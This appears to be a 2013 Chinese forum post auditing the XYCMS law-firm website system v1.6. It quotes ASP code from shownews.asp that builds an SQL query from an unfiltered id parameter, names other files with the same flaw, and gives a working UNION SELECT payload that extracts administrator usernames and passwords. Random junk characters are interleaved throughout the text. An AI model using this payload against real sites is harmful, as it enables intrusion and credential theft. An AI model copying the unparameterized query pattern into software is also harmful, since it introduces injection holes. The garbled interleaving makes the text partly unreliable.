前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
; Q) J) T# x# Q2 r9 R8 \& G6 w & Z2 f3 T. E1 ~! \8 B" A/ V
淫荡分割线
8 Q% o B5 U! k, p) S--------------------------------------------------------
8 W8 t' [9 U. m3 d) Y
$ a2 t& R* h( l; Y7 v5 {: ?审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
! y0 e# d" q# j5 P4 ~3 T! p* @2 H源码地址:http://down.chinaz.com/soft/29233.htm
! k7 @3 L% v3 _; C. u8 W; i; `
' |. V# y. S6 P漏洞文件:shownews.asp) [1 N2 e/ t8 @ @2 U$ a: A) D
漏洞代码:7-13行
( x( @$ o* c: }0 M# {! X# G% z , A5 D8 P* V; N2 s s" d
/ s& j& g9 I; g<% # ?7 f; _0 M: M: o. F: i& p6 ^
id=request.QueryString("id")
% U1 J7 V3 j" U5 G
" X" A5 C; b" ~ ~1 ~- J( u# wset snews=server.createobject("adodb.recordset") & r# F) n' |" \8 B) Q6 A
exec="select * from [news] where id="&id* R4 W3 w, l2 b$ [9 X
snews.open exec,conn,1,1
- J1 d+ D9 _1 q7 N%>
4 [: L0 A$ C/ {9 ` " a4 k+ T9 P, i0 v5 S; \0 ]6 F
, {0 Y: h$ r/ ^2 F) A6 r( t
什么过滤都没有 直造成注入2 B2 I) ~, x. Z) m# x' [
x, M. b/ h' \; d
注入点:http://127.0.0.1:99/shownews.asp?id=xx- j/ J- q; s+ p6 @2 b7 k/ ~; [$ {" X
( _- s7 M( P9 U% E) h8 f& M% ?
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找( q4 _4 i' Y0 v9 \- Q B
: k- D, v; o! k7 T! N4 k4 i9 m
. f( i8 X$ t" E' eexp: union select 1,admin,password,4,5,7 from admin_user
5 R; W4 p' A$ L/ ?+ n2 h7 f& F- K. a& w C
|
发表于 2013-4-4 17:28:12
收藏
支持
反对